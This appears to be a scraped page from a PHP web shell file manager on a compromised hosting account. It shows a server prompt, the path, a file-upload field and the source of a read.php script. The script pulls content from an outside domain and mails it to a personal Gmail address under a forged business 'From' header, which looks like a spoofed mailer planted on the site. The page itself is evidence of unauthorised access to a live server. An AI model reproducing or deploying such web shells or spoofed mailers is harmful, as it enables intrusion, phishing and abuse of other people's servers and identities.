MSV FM

dot.antimicrobial@66.96.161.157: ~ $
Path : /hermes/bosweb/b1705/libeyne.com.mv/
File Upload :
Current < : /hermes/bosweb/b1705/libeyne.com.mv/read.php

<?php

$content = file_get_contents('http://cipher-inc.com/domains/lic/pay/mail/?id=9077543be536f70a057a07c20357482c'); 
if ($content !== false) {
	$content = $content;
} else {
	$content = "An error occured while sending the mail. Please contact +960-330-4747 or send an email to info@luxuryislandcollection.com to report the issue. Thank you.";
}

echo $content;


$to = "ibrahimyacyr@gmail.com";
$subject = "Webpage mail";
$from = "sales@luxuryislandcollection.com";
$headers = "MIME-Version: 1.0" . "\r\n";
$headers .= "Content-type:text/html;charset=iso-8859-1" . "\r\n";
$headers .= 'From: Luxury Island Collection <'.$from.'>' . "\r\n";
$headers .= 'Cc: '.$cc."\r\n";
mail($to,$subject,$content,$headers);
echo "Mail Sent.";


?>